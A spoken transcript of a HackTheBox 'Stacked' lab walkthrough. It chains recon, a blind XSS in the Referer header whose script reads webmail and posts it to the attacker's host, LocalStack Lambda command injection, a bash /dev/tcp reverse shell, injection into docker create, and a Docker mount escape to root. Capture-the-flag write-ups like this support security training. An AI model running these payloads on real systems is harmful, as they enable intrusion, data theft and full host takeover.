What's going on YouTube? This is IPSec, and we're doing Stacked from HackTheBox, which is on the shorter end of insane machines, but that's not because it's not difficult. The difficulty in this machine really depends on the enumeration and recon, because it does something that I never expected a HackTheBox machine to do, and that is, say, go find an O-day in some software. Now, given this software is LocalStack, which isn't really production software, no one's running this in production, LocalStack itself is meant for developers to be able to test against AWS without paying for AWS. So the foothold on this box involves finding cross-site scripting to infect a user's browser so you can read their email, find a S3 endpoint that is LocalStack, and then use a known CVE to get a code execution on a Docker container, and then use PSPY in that Docker container when LocalStack itself runs Lambda functions, and find a way to get code execution. So with that being said, let's just jump in. As always, we start with an Nmap, so -sc for default scripts, SV enumerate versions, OA output all formats, put in the Nmap directory and call it stacked, then the IP address of 10.10.11.112. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. Then we have HTTP on port 80, and its banner is telling us it is running Apache, but also Ubuntu. And lastly, we have the HTTP title telling us it redirected to stacked.htb. So if we went to try to browse it, 10.10.11.112, we should see it just redirect us like it did. And the computer's like, I don't know what stack.htb is, so let's go and add that to our host file. So sudo vi etc host. And we can say 10.10.11.112, and that goes to stacked.htb. So now when I refresh this page and make this HTTP, not HTTPS, we get the web page. So it looks like we just have a static page up front. Not much information there. Looking at the source code, trying to get like what CMS this is. I don't really see anything. There is some like JavaScript, but this is just general bootstrap JavaScript to like work the countdown. Nothing to say it's like Vue or React JavaScript frameworks. We may be able to do some analysis and extract URL endpoints. So I'm going to play with the only field I see, which is this notify me. So I'm going to put an email address here, intercept it with Burp Suite, and see exactly what happens. Turn intercept on, click send, go back to my window, and it's not actually sending anything. I don't see the email I put in. So I'm going to guess this is some type of rabbit hole as this address isn't functional. So there's really only two things we can do. I guess three. We can do like virtual host enumeration. We can do a gobuster to try find hidden content. And we can also do a full Nmap scan. So let's kick off all three so we have a lot of recon going. So the first thing I want to do is just a normal gobuster. So gobuster dir -u http stacked.htb word list opt seclist discovery web content raft. What is it? Yeah, raft small words .text. And then for arguments, let's see, index.php. This is not a PHP website. We can try HTML. Looks like this is just a standard HTML. I'm going to add that as an argument here. You can also add text and everything like that. But each argument you take or add, it's going to make it take a lot longer time. So I try to do as few as possible. And then out, gobuster.dir.out. So now we essentially want to do the same thing with the virtual host. So gobuster vhost -u http stacked.htb word list opt seclist discovery DNS, then subdomains top million. I'm going to do 5000.text, and then out gobuster.vhost.out, and we can do a full Nmap scan. So sudo nmap-p- to do all ports -n, so we're not like wasting time doing DNS resolution. -OA output all formats. We'll put it in the Nmap directory, call it stack-all ports, and 10.10.11.112. So now we have all three things going. We can start looking at this gobuster vhost output on the bottom left. So if I cat, or let's just do less gobuster.vhost.out, we can see everything is redirecting us. and things have different sizes. So if I went to monitor.stack.htb, let's see exactly what happens. I'm just going to intercept this request, which I thought I did, but maybe not. Send that to Burp Suite. And then all the virtual host routing is doing is adding a different name to this host header, right? So I can put like please subscribe.stack.htb to see what is here. And it looks like the content size is changing because of the address here. So it's saying the server at this address redirected us, which means it's going to be hard to filter out based upon size because size is changing. We can try filtering out by status code, so grep-v 302 gobuster vhost.out, and don't see anything. The size looks like it's always going to be 2 something, so we can do grep-v and then like semicolon 2, and this is going to filter out any size that starts with 2. And there's also 3s, so we can filter this out. And we have nothing, which is a bit weird. I did notice that my grep filter was :space, and that also affects status. So I'm going to add a E here. So we're excluding E: space, and then 2 or 3. We don't have anything. Let's try 2. Let's see. Nothing there. I'm going to try excluding status 302. And we have a hit. We got extremely unlucky with this because the size is 302. So when we did our grep or the size has 302 in it. So when we excluded the 302, we excluded this. So that was extremely unlikely. The odds were not in our favor. I guess one of the ways you could go about this, what I would be doing is making sure my scan finishes, which we do see it finish there. And then I'd try to like awk information out of it, probably. So gobuster.vhost.out, and then we can do awk 1, 2, 3, 4, 5, 6. This is parameter 6. So we can do print $6, and then we can sort, and we see it right away, the 302, but we can also do unique-c, and then sort-r to reverse, maybe number r, number. Okay, so what I did here is generally how I find anomalies in data. Whenever I have a large list, I always just look for all the unique values, count them, and then say reverse it so it shows me everything that stands out. Because something that has 688 matches isn't really that interesting to me, but something that just has 1 match, that is interesting. And this one is really interesting because it's 1 match with a large size. So that's how you find like those needles in the haystack with just simple processing. But let's see exactly what that was. So this is portfolio.stacked.htb. So let's add this into our host file and navigate there. So sudo vi etc host. And then if I don't hit page down and screw up where my cursor is, that'd be great. I think I'm still intercepting, so let's just turn this off. Go there, and here we have the portfolio page. So let's take a look at it. And we can see Docker, LocalStack. I don't know what this logo is. It's got a lot of lorem ipsum. I'm guessing this is like OpenStack or something like that. Debian, CentOS, Ubuntu. Let's see. I bet like the name will be specific. Path. Maybe not. I know that's a logo for something. Let's see. Can I just save image? Save page? I'm guessing not. Because I was going to say, if I can save the image, I can just go to like Google and do a reverse image search. Let me open up Flameshot. now I can print screen. I'm just curious if this works. So copy. This is generally what I would do, and hunt for the save capture. I'm just gonna call this logo. I'm gonna go to images.google.com, upload this, upload an image, browse, IPsec. Where's logo? There it is. It's uploading the file, full stack. So I don't think it's specific software. It just stands for full stack. We got an about page. So the about designing it, it's talking about LocalStack, which is open source software to mock AWS services. There's a free download of the Docker that they provide, so we can download that. And then there's a contact form. So let's take a look at this contact form. I'm going to open up Burp Suite, and let's just do image source is equal to HTTP 10.10.14.8 / I'm going to call name / image. And then let's do the same thing for everything. So this will be email, phone, subject, and message. And I generally do this to test for like cross-site scripting. And then based upon what I get a hit for, that's what I know was cross-site scriptable. So let's turn proxy on, send it. That's not it. That's uBlock origin. That was weird. Oh, please enter an email address. So root.ipsec.rocks. We need a valid phone number. 123.123.123.4. What is the format they want for a phone number? I hate when websites don't tell me the exact format. They want 12 digits, or I can just copy their placeholder like that. So let's send. Let's see. Here we go. And we can also add a few other things. So we need this portfolio.stack.htb because we know there's virtual host routing. But we can probably do user agent. So I'm going to paste it here. We can say UA for user agent. And then Control U to URL encode it. Content type. Actually, I don't think these would have to be URL encoded. And then we got referrer, so let's add it here. Origin, all this stuff, I guess, will be fine. So sudo python3-m http.server, put it on port 80, send this in, and it says our form has been submitted. So now that we have that working, there was something else we want to take a look at, and that was the Docker image on this platform. So let's go back to portfolio, download this, save it, and then we can do, oh God, I got a lot of windows open. There we go. So let's move downloads docker compose.yaml to a directory and take a look at the Docker image. So let's see, what do we have? Well, we're using LocalStack version 0.12.6, so that is definitely interesting. We got a few ports, 443, 4566. This is the default LocalStack port that I know. 4571, and port 8080 for a port web UI. So the web UI to, I guess, LocalStack. Services is the serverless. Looks like a bunch of stuff. We have Lambda being used. API key in LocalStack is meaningless. It doesn't really do any type of authentication. I've covered that in a few videos. It's just a quirk I know from working with LocalStack in the past that there's no such thing as an API key. You need data there, but it doesn't do any validation. So that's about it. I guess the key thing is port 8080 has a web server. But we want to look at when 12.6 was released. And, ooh, we got a hit on our cross-site scripting on referrer. So definitely something interesting there, but let's take a look at the LocalStack changelog. Go to Google. And let's see, the current version is 14.1. We wanted 0.12.6. And that's like halfway down this page. How old is this? And this changelog is not like human readable. Oh God. Go to the history. 0.12.6. February 1st, 2021. And it's March 2022. So this is about a year old, which seems old. I don't know when this box was exactly released. But we can also probably do like CVE DB. Oh, probably CVE search LocalStack and find MITRE's page. Well, this is a specific CVE. I think I said, the exact version we want. 2021 has 2 vulnerabilities. So we go to 2021. I'm going to go with the CVE 10 before I do the 4.3. Let's see. Dashboard component of stack lift LocalStack 0.12.6 allows shell command injection via the function name parameter. So we see LocalStack 12.6 and the version that they provide is 12.6. So we know it's vulnerable to that. And we also have a cross-site scripting vulnerability here. The issue we have right now, though, is we don't know how to access their local stack. We know local stack exists. It's probably on port 4566 or 8080. We did do a full Nmap scan. So if I do stacked-all ports.nmap, we can see, well, 2376 is open at some Docker thing, but we don't see port 8080, which is what I'm assuming is going to be this web interface here, the dashboard component. Or I don't see 4566, so I can't just access it. There's probably some type of virtual host routing, or I have to do something through cross-site request forgery in order to exploit this. So I'm going to start with fingerprinting this browser. So to start, I'm just going to have netcat listen on port 80 because I want to see all the headers. When I did this request, I couldn't see all the headers. All I could see is every request. And the reason why I did not use netcat is because I want to see if this whole form, where's the form? Come on. This whole form was cross-site injectable. It isn't. Only the referrer one was. So we can get rid of the name. We can put IPSEC here. We can say the subject, please subscribe to IPSEC. And for the message, he really rocks. Because this whole piece doesn't matter. We only care about this referrer. I'm just right now cleaning it up because I think it makes it easier if we only have one cross-site scripting payload instead of a bunch in the future request. So here we can put something here. I can try script source is equal to http 10.10.14.8 / pwn.js / script, send it, and we just play the waiting game for them to talk back to us here because script src 10.10.14.8 pwn. Yep. So what I'm going to do is run a date here, and when I see a response, I'm going to run date again. And that will help me identify the type of cron that is running in the background. If I see it at the next minute, I may know it's running every minute to do this. And the reason why I know this is cross-site scriptable in the referrer header, again, is because it made the request here. And in my previous one, I put a unique URL in each of the injection points. So, yeah. So I made a funny mistake when I was doing this. I left my tmux in edit mode, which means this pane would never update. I was like, man, this is taking a while. I opened up a new pane, looked at date. I was like, man, it's been like over 2 minutes. What's going on? Then I went back to this pane, noticed I was in edit mode, control C out of it, and we have it getting pwn.js. And we can see the referrer, which means where they launched this from, was mail.stacked.htb on ID 5, which isn't that interesting to me. But what is interesting is this new domain, mail.stack.htb. So let's add this to my host file. So if I do etc host, we can do mail.stack.htb. And I don't think this is going to go anywhere because our virtual host thing did not find this. So this has become really interesting. If I go here, it just redirects me. So what I want to do is look at the contents of this page, and we can do that through cross-site request forgery, I believe, or maybe it's, I don't know the correct terminology for it, but we can do it through JavaScript. We could also probably do it through the Beef cross-site scripting framework or application, whatever it is. However, Beef doesn't play well with a lot of CTFs, so I like keeping it simple and just hard coding some JavaScript. So let's make dir www because we're going to host a file here. We're going to call pwn.js, and we can just do var target is equal to http mail.stacked.htb, and we need to end that with a semicolon, and var request 1 is equal to new XML HTTP request. We have to open it, and if this looks unfamiliar to you, we've done this in a lot of previous videos. The CrossFit 2 video is probably where it's explained the best for me. So I would recommend looking at that. We're using the XML HTTP request, which I guess is like codenamed Ajax and web things. Even if we look at one of these things, like this X requested with, the whole like form submission was done through this JavaScript library of XML HTTP request. So we're just mimicking exactly how it submitted data on the web form, because this is the easiest way I know to make a browser make a request somewhere, get the data back without changing the contents of the page. Think of it like a background web request. And this false flag is going to make it a blocking request. So if I go to XML HTTP request, let's see, is there an easy way to show this? All the functions, block. Let's see, HTML, blocking. I don't know exactly the man page to figure out what all the arguments are, but this one is blocking. So if I make this true, then the web browser is not going to wait for this request to finish to move on. If it's false, then it becomes blocking. So the web browser is not going to move forward until this request finishes. So that's what that command is. And I know I explained it better in CrossFit 2, so definitely refer back to that video. So now we're going to send this request, and then we're going to save the response by rec1.response text. And that's why we wanted to make this a blocking request via the false right here, because if we didn't, the JavaScript would get here and it would try to save the response before this request finished, and it would be null. So now we want to do a second request. So we're going to do var request 2, and we can say request2.open. We're going to make this one a post because post data sends better than get, or like sends content better. There's less like bad characters in a post data. And then we can say HTTP 10.10.14.8 / we'll say port 8000. And then in here is going to be where we put the response. And I forgot a semicolon here. And that should be it. So what we do is we go to mail.stack.htb, save the request, create a post request to 10.10.14.8 port 8000, and then put the response of request 1 into that body. So let's do python 3-m http.server port 80. And we want to go into www where pwn.js is hosted. And we also want to save this guy. So HTTP server, there we go. And then nclvnp 8000, direct this to, we don't have to be in www here. nclvnp 8000 directed to page.html. There we go. So now when I send this request, we should have the user hit a web server. They're going to load pwn.js, which is going to make them navigate to mail.stack.htb and send the results here. So hopefully that all works. Let's look at the date to see exactly where we are. It's been a new minute here. There's nothing. I'm just going to send the request again to make sure it's there. I am requesting pwn.js. So I'm going to guess in the next 45 seconds on the new minute mark, we'll see this happen. And we have the user requesting our JavaScript. Oh, there we go. And he has now hit a thing. Our netcat doesn't show any information because we just directed it to page.html. So if I look at page.html, we can see it does have a web page. I'm just going to delete the HTTP header, so we have just the raw HTML. And I'm going to do Firefox on page.html. And we can see it's a mailbox. We have a few emails asking them to subscribe to me. And I'm guessing when they clicked on one of these emails, that is exactly when they got hit with this cross-site request forgery attack. So there is this S3 instant started email. If I'm looking at the link in the bottom left, I see it's going to read mail.php !ID equals 1. So let's edit our JavaScript, v-pwn.js, and we're going to change this to be copy link, paste it down here. We want this to be read-mail.php id is equal to 1 because we want to use this cross-site request scripting or cross-site request forgery in order to read that email. Save that, and we'll start the netcat back up. Send this, and I'm just going to clear this so it's a bit better. And we're going to pause the video yet again to wait for them to request. There we go. We have them hitting pwn.js, and we have the connection back. And just as a reminder, every time they get this JavaScript, it still takes another 20 to 30 seconds for them to hit that second page. So let's use Firefox again to open page.html and see what we have. And I forgot to delete the headers up here, so that's why you see those. And we see, hey, Adam, I have set up a S3 instance on s3-testing.stack.htb. So this is how they can configure it. Awesome. So let's add this into our host file. So sudo vi etc host, and we can add s3-testing.stack.htb, navigate to it by this, or in a browser, I forgot the word there, and we just see status is equal to running. So what I was hoping to see is like an S3 bucket or something like that. Just seeing this JSON, this is the like LocalStack just default page that says, hey, LocalStack is running. We can try intercepting in Burp Suite to make looking at the headers a bit easier. Let's send this to repeater tag, enter, and we really don't have much. We have exposed headers, Amazon version ID, but nothing really. The one thing they did mention earlier in the box is Lambda. So AWS Lambda is like a serverless technology. Think of it like you just create a Python script and then that is your web server. You don't have to worry about a server or anything else. You give Lambda that Python script and it executes it and it hosts something or runs the code. I don't think it's meant for like websites. It's just meant for like parsing data, things like that. It's just a way to modularize running code. So I'm going to Google Lambda creation example, maybe. Hopefully this finds it. Lambda function on the console. Let's see, do they have an example file? They don't. Let's see. Getting started. Let's try this link. A lot of just playing with new services is looking for a basic hello world. This is talking about how to create it. Exports handler. Let's see. This isn't the one I used when testing, but we may be able just to copy this and return something. So I'm going to try this. Let's go make dir, we'll call this Lambda, and we'll call it index.js because this is JavaScript we copied. We don't need a callback or anything. We just want return, please subscribe. I'm not going to do a space because I don't know if spaces are bad characters or anything. I'm just keeping it as simple as possible. I want this Lambda script to get executed, and I want it to return a string. Don't want it to be complex. The next piece involves doing AWS configure. We're using the AWS command line client, and I believe I installed that with like AWS CLI, app search, AWS CLI. Let's see, does that exist? It does. So I've installed this before because we've used AWS in previous boxes. I know Sync, GoBox, and one other one did use AWS. I'm sure if you use ipsec.rocks, you can find it. And this is where being LocalStack doesn't really matter what we put for the access key or ID, just matters that we have one. So now we should be able to do AWS Lambda --endpoint is equal to HTTP s3-testing.stack.htb, create function, and I'm going to just use these backspaces or backslashes to make this look a bit easier to read. So the parameter we want is function name. We can give it anything we want. I'll just do A. And then we want to give it a zip file, which is our Lambda thing. And I didn't know all these off the top of my head. AWS Lambda create function example. Maybe something like this will give us an example. Let's see. Function name, options, S3. A lot of this is just Googling around. We're pretty much doing everything here. So runtime, zip file, handler, role. This is going to be like ARN, whatever. Again, since we're using LocalStack, this whole parameter doesn't matter because it doesn't have any concept of access controls. But that is how I figured out all these parameters. Zip file, file B, and I know it's file B because that's what they use. And I'm going to call this index.zip, and we want to make index.zip in this directory, so I'm going to zip index.zip index.js, so we have that added here. Then let's see, the next thing we want is role, does not matter. Then we'll want handler. I'm going to do index.handler. I think this has to be the file name. And then runtime, and the example uses Node.js 10.x. So runtime Node.js 10.x. So if we run this, invalid choice, because I made a typo. LAMBDA. There we go. Must specify a region. Run AWS configure. AWS configure, access key. Let's do US East 1. There we go. And now we have created a Lambda function. So we can do AWS Lambda, copy this whole endpoint. I know there's probably a way we can do this in the config to set our endpoint. Invoke function name is equal to A, because that's what we set it as here, and we can confirm that's what it is. And where we want the file to be outputted, so I'll just call it output. And oh my, LAM. For some reason, I can't spell lambda. If I cat output now, we see it set to null. So something went wrong, but it didn't go wrong horribly, right? It just didn't run a function. But we confirmed we could create a Lambda instance. Let's see. Exports handler. I'm just trying to think what I did wrong here. Maybe we need a semicolon. Index.zip. Let's zip this back up. And then let's do the create function. And we'll call this function name B. Invoke. Function name B. Output. Cat output still set to null. So let's go back over to Google and try to find an example. So AWS Lambda example application Node.js. Maybe if we get that specific, we'll find an example app. Blank Node.js. Maybe this. Let's see. This is sh event.json. I don't think this is it. Function index.js. This is a lot more than I would expect. Let's see. Let's go back. Where's my Google query? AWS example node, function handler. This is a really simple example, index.js. Let's try this one. So v index.js. So they're returning something slightly different, and they also have a console log. Oh, they're also using async, and I did not use async. So maybe that is the key. Let's rm index.zip, create a new one, create the function. It's probably been a long enough time where this function's been deleted. It has. Run this, cat output, and I was outputting a log stream, and this looks like a log stream. So I verified I can now run a Lambda function. Let's see, index.js. Wonder if I just do return, please subscribe, then remove, zip it again. Let's create the function. We'll call it A this time. The functions get deleted like every minute or two or something. So that's why I just keep rotating the names back and forth between A and B. If I cat output again, now it says please subscribe. So I'm guessing it's that async that I was missing previously. Let's get rid of that console log line. So this is pretty much exactly what I had before, minus the async parameter. Where is the create function? We'll name this one C because it hasn't been that long since I ran it. Invoke C output, cat output. So yeah, it's definitely needed the async command. So we can now execute Lambda things, but this doesn't really help us all that much because if we even got a shell here, it's like an empty OS. It's not meant to hold data. It's just meant for processing. So going further isn't really that interesting. The main reason we wanted to verify that is because we did see there was a CVE related to creating Lambda by the function name. So enter command here, this create function. There is command injection right here, confirmed by this CVE because we know we're running 12.6. We don't have access to the dashboard. However, we can probably use cross-site scripting to send the user to the dashboard to execute our command injection. So I'm going to do a quick test. I'm going to say the function name is equal to C semicolon. We don't need a split pane. And then I'll just do wget 10.10.14.8. And we'll say port 8000. We'll listen on port 8000. We create this. Make sure this all works, and we can see once the Lambda function is created, I want to see the function name set, and something was wrong there. Run this again. It looks like maybe the function name a colon is a bad character, because we can see when calling create function should not contain a colon. So I'm going to change this just to be 10.10.14.8. So we can see it's created and the function name is wget 10.10.14.8. So I should change this to be port 80. It's already in use by this web server. And then we want to, actually we don't have to use pwn.js because all we have to do is send the user somewhere else. So if I go here, instead of doing script source, I can just say script, then document.location is equal to HTTP 127.0.0.1 port 8080 / script. We can send that. Let's make sure this function still exists. Function already exists as the error message. And the reason why we know it's port 8080 is because earlier we had downloaded a Docker Compose file, and it says the web UI is port 8080 on 127.0.0.1. So I'm hoping the user, which will cross-site scripting, can access that instance. So I'm sending his browser to that URL. I may want to put this in like pwn.js so I can see them request me so I know they're getting this JavaScript, because right now it's blind. I don't know if I type that document location correctly. I mean, I can eyeball it all I want and think I caught all the typos, but I'm really bad at catching typos. So if I put it to pwn.js on my web server, then they'd hit that, and then I would send them the document.location so I know I sent it to them. So if this doesn't work within the next minute or two, that's where I would be going. But we have this. So we see 10.10.11.112 made a wget to me. So I know I have command execution. I just can't use a colon character, which isn't that big of a deal. A reverse shell doesn't need that. So I'm going to do echo-n. We can say bash-i dev tcp 10.10.14.8 port 9001, 0 and 1, like that. And then base64-w0. And this should all be fine. I mean, I guess we could get rid of the plus and equal signs. So let's see, let's add a space here. That gets rid of both of those. And that's probably not needed. It's just habit to always avoid bad characters when I can. And here, now we can do echo-n, paste this, base64-d, and put it into bash. And we want to listen on 9001. Unable to load param file, so we need to go back into my Lambda directory. We uploaded the new function, send the cross-site script request, and within a few minutes, hopefully we get a shell back. But chances are we won't, because we did a lot of complex things here. So just going to pause the video and we will wait. And it actually worked. I did not think it would, but it did, and we got a shell. So let's do python 3-c import pty, pty.spawn, bin bash. Oh. Did that work or not? Bash RC permission died. I think that still may have worked. stty raw minus echo, semicolon fg, enter, enter. Yep, it all worked. It looks like even when my reverse shell came in, no, it never tried to, wait, no it did. So it tried to execute bash RC on my reverse shell, got permission denied. I launched another shell, so it's no surprise that we see permission denied again. I can export xterm is equal to, or export term is equal to xterm. So I can clear the screen, and then we can begin enumerating this Docker container. And I know we're in a Docker container because if I do lsla on /, we see .dockerenv, and we had also exploited the dashboard component of LocalStack, so I'm assuming we're in the LocalStack container. If I do who am I, our username is LocalStack. If I go into my home is set to root. So this is why that bash RC error was happening, because the home for LocalStack is set to /root, which is weird. Local, let's see, home LocalStack. I don't know exactly why it's doing that, but my home is home/LocalStack, and that's where user.txt is, and there's nothing really else here. But this is also where the box gets extremely hard, because you normally don't expect to find a O-day in some type of software, but LocalStack is not meant for production. It's development software and does have a lot of bugs. And I say O-day because if we go back to this MITRE page, we already exploited this one, and there's no other CVEs out for it. But if we hunt for a CVE here, we will find one. And I think CyberGeek has now applied for a CVE to get on the box. I'm really surprised no one applied for one like while this box was live. But that's a different point. One of the best ways to find low-hanging fruit is just running like a PSPY on the process. So I'm going to do a GitHub search on, or Google search on PSPY, so we can download this application. Go over to the releases tab, and we want to download probably PSPY 64. I like grabbing the regular version, not the small one. So let's just copy this link, and then go into a www directory, wget PSPY. Let's make sure we downloaded it. It's a ELF file, so it's executable. I have a habit of just like downloading GitHub pages. Like if I copied this and pasted it, it would be HTML text, and then be confused, why doesn't this execute? So that's why I do it that way. So now we're just hosting it. We can go to dev shm, wget 10.10.14.8, port 8000, and then PSPY 64. And it's going to take a few seconds to download, chmod plus x, to make it executable. And then we can execute it. It's not tab auto-completing and permission denied. I'm guessing there's a no exec in dev shm. So if I do mount grep no exec, there is a lot of them here. Let's just also grep for shm, and we can see no exec is applied to dev shm. So let's move this to be temp, and let's try executing it here. And it looks like it executes just fine. And as I said, whenever you want to look for CVEs without doing any type of like reverse engineering things, it's always good just seeing all the calls a program makes. So let's go back to how we created the Lambda instances. So let's do create. Is this it? No, that's not. Let's see. Did I do it in this pane? Let's see, create. Yeah, this is it. So when I created this instance, we'll probably have to go back into the Lambda directory. Let's do create. So we're just going to create this function, and we can see the local stack container doing things. And then I'm going to invoke the function, and we can see it doing things again. And it needing Docker means it's a root privilege. So we know this is executing under the UID of root. And when we look at this, we have root executing a docker create command to run this Lambda instance. And let's see, it is passing like index handler, right? We have a lot of things it's passing. We could probably inject at Node.js, this index handler. There's a lot of potential things. So what I'm going to do is go back to a docker create, And let's see, we have index handler right here. I'm going to do a wget 10.10.14.8 slash, I wonder if I can, this is going to be weird. I'm trying to like triple command execute this. So I'm violating my rule of keep it simple, stupid. But what I'm doing here is I'm going to try to create a container that has command execution. So when it does this docker create command, it's going to execute this this wget command. And I'm trying to get the URL to be the current user that is requesting this. So let's see what happens here. I'm actually not sure. So we created the container. Let's execute it. And oh, it worked. So we have get/root. So we know root is executing this without like going with a reverse shell. We're able to find that out. So that is one way I generally do a lot of things, just because when I get command execution, I like knowing exactly what user I executed as. So I'm going to grab this, which was a reverse shell from earlier. And we're going to go back to this create. And I'm just going to paste a reverse shell. So boom. Function name, I'm going to call it shell. And, oh, did I listen on 9001 or 80? Probably 9001. Paste this. Function name, call it shell. And now we have a reverse shell, and we are root. In this shell, we're only LocalStack. So if I went to do like docker ps here, we can't because we need to read this root certificate or the certificate authority. But since I'm root, we can read that and we can run docker commands. So now all we have to do is create a Docker container to mount the root, because if you have Docker, you're essentially root. I bet GTFO bins is going to tell me. If not, Hacktrix probably will. It's been a while since I did this, but yeah. So docker run -v. So let's see. I'm going to do Docker images to list what images are on this box. So let's see. Let me do my stty command so I can use my arrows. So Python 3, import pty, pty.spawn, bin bash. Okay. stty raw minus echo fg. There we go. So if I do Docker images and then I paste this, I'm going to run a Docker. So I'm creating this. The -v is volume. So this is the host partition. So where Docker is running on the host, not a container, I'm going to mount /. And in the container, I'm mounting it to /mnt. And then --rm, this is delete container once it stops. --it, this is going to be the image tag, I believe. So we can say, we'll call this Node.js. It doesn't matter what we do. That's in Lambda 1. Let's do 0.12.6 to see if this works. Chroot. So this is going to run the command chroot and then drop us into a shell. Can't find image. So we probably just want to do LocalStack -full. That's not image tag. It's probably like image name or something like that. LocalStack like this. Can't find LocalStack that. LocalStack -full. And if this one doesn't work, I'm just going to copy the image ID because that probably will. There we go. Unable to find image. Oh, it just errored quickly, I think. Yeah, just errored quickly. So IT, I'm going to do image ID. I don't know Docker. Surprise. Wait, can't mount over existing file exist. Am I here? No. Let's see. pwd, optcode, LocalStack, host name. I'm definitely in the container. And we are /root right now. Let's see. Let's get rid of the chroot command. File exist. I did not expect to have issues here. Let's see, docker run. Does Alpine exist here? I doubt it has the Alpine image. I would have to go and download it. Yeah, unable to find image. Docker images. Let's see. Node.js 12.x. Can't find that /latest. I wonder if it wants the whole path. So if I do this. Nope. Let's try this tag. Okay, so that ID looks like it may have worked. It's starting up LocalStack, and this version of LocalStack that starts will certainly have it mounted, but I don't know if I'm in the container. Let's see, starting. I know there was a cleaner way to do this. Let's see. It's waiting for all LocalStack services to be ready. NC LVNP 9001. Let's get ourselves another shell. So I create that endpoint. Get the shell. Docker PS. So this one is ours. So I can probably do docker exec-it sh ID. Let's see. I wonder if that did not work because I did not have a TTY. Python 3-c import pty pty.spawn bin bash stty raw minus echo fg. Then let's run this docker exec command again. There we go. So if I go /mount, we now have the root partition of the host. No, we don't. We have... What did I just do? This box was supposed to be easier. Docker PS. Let's see. Docker kill 1b0. So I killed that instance of LocalStack. See, chroot /mount sh. Does it work like this? Docker PS. This one started 7 seconds ago. Docker exec-it a33 sh. ls/mount. So mount is definitely written. And there we go. I'm not sure what I screwed up earlier. Maybe I did a docker exec into myself. But here we have the /mount directory root. Let's see. A good way to explain it. We mounted the host /directory in /mnt, so now we can access it. And we can see root.txt there. If we do cd.ssh, we could ssh keygen to drop a key. Not found. Let's just create our own key then. sh keygen. We'll call this stacked. Cat stacked.pub. Grab this. Copy v authorized keys. Paste it. chmod 600. chmod 600 stacked. sh-i stacked. root at stacked.htb, and hopefully we did that all correctly. We did. So that's how you can actually get code execution on it. So hope you guys enjoyed that video. Take care, and I will see you all next week.